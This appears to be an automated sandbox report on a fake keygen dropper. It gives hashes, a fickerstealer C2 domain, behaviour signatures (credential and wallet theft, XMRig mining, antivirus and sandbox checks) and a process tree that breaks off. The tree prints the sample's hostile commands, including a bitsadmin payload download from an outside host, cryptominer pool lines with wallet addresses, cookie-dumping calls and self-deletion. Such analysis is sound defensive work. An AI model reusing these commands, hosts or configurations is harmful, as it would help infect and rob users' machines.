Resubmissions

25-04-2021 09:42

210425-v9mttlcxke 10

25-04-2021 08:59

210425-1d89vxfyln 10

25-04-2021 07:37

210425-b8smdccdwe 10

25-04-2021 06:55

210425-1csfnkw57n 10

24-04-2021 20:32

210424-x7kp9rrf4x 10

Analysis

  • max time kernel
    1801s
  • max time network
    1781s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    25-04-2021 06:55

General

  • Target

    keygen-step-4 — копия.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 47 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS
    1⤵
      PID:1388
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2528
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2804
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2788
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2772
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2516
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1848
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1280
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1204
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1072
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:684
                    • C:\Users\Admin\AppData\Roaming\veavdde
                      C:\Users\Admin\AppData\Roaming\veavdde
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5196
                      • C:\Users\Admin\AppData\Roaming\veavdde
                        C:\Users\Admin\AppData\Roaming\veavdde
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:6120
                    • C:\Windows\system32\rundll32.exe
                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\JEuiESaG\JEuiESaG.dll",JEuiESaG
                      2⤵
                      • Windows security modification
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:5852
                    • C:\Users\Admin\AppData\Roaming\ggavdde
                      C:\Users\Admin\AppData\Roaming\ggavdde
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5268
                    • C:\Users\Admin\AppData\Roaming\veavdde
                      C:\Users\Admin\AppData\Roaming\veavdde
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:1812
                      • C:\Users\Admin\AppData\Roaming\veavdde
                        C:\Users\Admin\AppData\Roaming\veavdde
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        PID:5328
                    • C:\Users\Admin\AppData\Roaming\ggavdde
                      C:\Users\Admin\AppData\Roaming\ggavdde
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      PID:4816
                    • C:\Users\Admin\AppData\Roaming\veavdde
                      C:\Users\Admin\AppData\Roaming\veavdde
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:1376
                      • C:\Users\Admin\AppData\Roaming\veavdde
                        C:\Users\Admin\AppData\Roaming\veavdde
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        PID:2828
                    • C:\Users\Admin\AppData\Roaming\ggavdde
                      C:\Users\Admin\AppData\Roaming\ggavdde
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      PID:3696
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:68
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:564
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:3212
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3996
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3124
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:4004
                        • C:\Users\Admin\AppData\Local\Temp\is-FCH1O.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-FCH1O.tmp\Install.tmp" /SL5="$40194,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:3852
                          • C:\Users\Admin\AppData\Local\Temp\is-R7HCO.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-R7HCO.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:728
                            • C:\Program Files\Windows Security\AJFXCNAWHD\ultramediaburner.exe
                              "C:\Program Files\Windows Security\AJFXCNAWHD\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3856
                              • C:\Users\Admin\AppData\Local\Temp\is-2VUVK.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-2VUVK.tmp\ultramediaburner.tmp" /SL5="$50054,281924,62464,C:\Program Files\Windows Security\AJFXCNAWHD\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:3956
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:2288
                            • C:\Users\Admin\AppData\Local\Temp\06-8be51-e4b-70f9b-72bb80141fb38\Myvanubasae.exe
                              "C:\Users\Admin\AppData\Local\Temp\06-8be51-e4b-70f9b-72bb80141fb38\Myvanubasae.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1048
                            • C:\Users\Admin\AppData\Local\Temp\aa-a478d-5be-654b4-9057fb45142f9\Wyshaerybuno.exe
                              "C:\Users\Admin\AppData\Local\Temp\aa-a478d-5be-654b4-9057fb45142f9\Wyshaerybuno.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:3800
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ljaqac5n.cdr\instEU.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4760
                                • C:\Users\Admin\AppData\Local\Temp\ljaqac5n.cdr\instEU.exe
                                  C:\Users\Admin\AppData\Local\Temp\ljaqac5n.cdr\instEU.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4964
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rlyduutq.3jq\google-game.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4812
                                • C:\Users\Admin\AppData\Local\Temp\rlyduutq.3jq\google-game.exe
                                  C:\Users\Admin\AppData\Local\Temp\rlyduutq.3jq\google-game.exe
                                  7⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • Suspicious use of SetWindowsHookEx
                                  PID:5044
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                    8⤵
                                      PID:2764
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\opwsavu3.mvn\md1_1eaf.exe & exit
                                  6⤵
                                    PID:4780
                                    • C:\Users\Admin\AppData\Local\Temp\opwsavu3.mvn\md1_1eaf.exe
                                      C:\Users\Admin\AppData\Local\Temp\opwsavu3.mvn\md1_1eaf.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:4928
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\frkzf5jm.0t3\y1.exe & exit
                                    6⤵
                                      PID:3988
                                      • C:\Users\Admin\AppData\Local\Temp\frkzf5jm.0t3\y1.exe
                                        C:\Users\Admin\AppData\Local\Temp\frkzf5jm.0t3\y1.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:3684
                                        • C:\Users\Admin\AppData\Local\Temp\12cZfIgKyw.exe
                                          "C:\Users\Admin\AppData\Local\Temp\12cZfIgKyw.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:5596
                                          • C:\Users\Admin\AppData\Roaming\1619340811550.exe
                                            "C:\Users\Admin\AppData\Roaming\1619340811550.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619340811550.txt"
                                            9⤵
                                              PID:1184
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\12cZfIgKyw.exe"
                                              9⤵
                                                PID:5764
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 127.0.0.1 -n 3
                                                  10⤵
                                                  • Runs ping.exe
                                                  PID:5604
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\frkzf5jm.0t3\y1.exe"
                                              8⤵
                                                PID:5692
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /T 10 /NOBREAK
                                                  9⤵
                                                  • Delays execution with timeout.exe
                                                  PID:5856
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pdojalib.hvo\askinstall39.exe & exit
                                            6⤵
                                            • Loads dropped DLL
                                            PID:2764
                                            • C:\Users\Admin\AppData\Local\Temp\pdojalib.hvo\askinstall39.exe
                                              C:\Users\Admin\AppData\Local\Temp\pdojalib.hvo\askinstall39.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:3472
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                8⤵
                                                  PID:5300
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    9⤵
                                                    • Kills process with taskkill
                                                    PID:5500
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5vsacokc.e1q\inst.exe & exit
                                              6⤵
                                                PID:4408
                                                • C:\Users\Admin\AppData\Local\Temp\5vsacokc.e1q\inst.exe
                                                  C:\Users\Admin\AppData\Local\Temp\5vsacokc.e1q\inst.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:2992
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\53a1q2yr.yt5\SunLabsPlayer.exe /S & exit
                                                6⤵
                                                  PID:3468
                                                  • C:\Users\Admin\AppData\Local\Temp\53a1q2yr.yt5\SunLabsPlayer.exe
                                                    C:\Users\Admin\AppData\Local\Temp\53a1q2yr.yt5\SunLabsPlayer.exe /S
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Drops file in Program Files directory
                                                    PID:5200
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:5864
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:2164
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:5172
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:5440
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:5548
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:5852
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                                  8⤵
                                                                  • Checks for any installed AV software in registry
                                                                  PID:2988
                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                  8⤵
                                                                  • Download via BitsAdmin
                                                                  PID:6132
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pDeO7Jw1fMUeRqaw -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  PID:5300
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pPPviIyAEhz2BJi1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:1148
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:5788
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:4116
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:4724
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:5740
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:4944
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\JEuiESaG\JEuiESaG.dll" JEuiESaG
                                                                            8⤵
                                                                            • Loads dropped DLL
                                                                            PID:4632
                                                                            • C:\Windows\system32\rundll32.exe
                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\JEuiESaG\JEuiESaG.dll" JEuiESaG
                                                                              9⤵
                                                                              • Loads dropped DLL
                                                                              • Drops file in System32 directory
                                                                              PID:5148
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:3820
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                                              8⤵
                                                                              • Drops file in Program Files directory
                                                                              PID:3996
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:4648
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:4532
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk1E78.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:2300
                                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:2240
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uanz3cj2.c3j\GcleanerWW.exe /mixone & exit
                                                                                6⤵
                                                                                  PID:5332
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gtsxukqb.ifa\toolspab1.exe & exit
                                                                                  6⤵
                                                                                    PID:5516
                                                                                    • C:\Users\Admin\AppData\Local\Temp\gtsxukqb.ifa\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\gtsxukqb.ifa\toolspab1.exe
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:5848
                                                                                      • C:\Users\Admin\AppData\Local\Temp\gtsxukqb.ifa\toolspab1.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\gtsxukqb.ifa\toolspab1.exe
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:5452
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zuadpqfw.zsu\c7ae36fa.exe & exit
                                                                                    6⤵
                                                                                      PID:5716
                                                                                      • C:\Users\Admin\AppData\Local\Temp\zuadpqfw.zsu\c7ae36fa.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\zuadpqfw.zsu\c7ae36fa.exe
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:6080
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rluknkmx.dhe\app.exe /8-2222 & exit
                                                                                      6⤵
                                                                                        PID:5968
                                                                                        • C:\Users\Admin\AppData\Local\Temp\rluknkmx.dhe\app.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\rluknkmx.dhe\app.exe /8-2222
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5136
                                                                                          • C:\Users\Admin\AppData\Local\Temp\rluknkmx.dhe\app.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\rluknkmx.dhe\app.exe" /8-2222
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:5900
                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Modifies system certificate store
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:4156
                                                                                • C:\Users\Admin\AppData\Roaming\E092.tmp.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\E092.tmp.exe"
                                                                                  3⤵
                                                                                    PID:4296
                                                                                    • C:\Users\Admin\AppData\Roaming\E092.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\E092.tmp.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks processor information in registry
                                                                                      PID:4820
                                                                                  • C:\Users\Admin\AppData\Roaming\E323.tmp.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\E323.tmp.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4604
                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                      -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w18541@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                      4⤵
                                                                                        PID:1616
                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w31217 --cpu-max-threads-hint 50 -r 9999
                                                                                        4⤵
                                                                                        • Blocklisted process makes network request
                                                                                        PID:996
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                      3⤵
                                                                                        PID:4324
                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                          ping 127.0.0.1
                                                                                          4⤵
                                                                                          • Runs ping.exe
                                                                                          PID:4136
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks whether UAC is enabled
                                                                                      PID:6092
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      PID:4612
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4876
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:6008
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5356
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
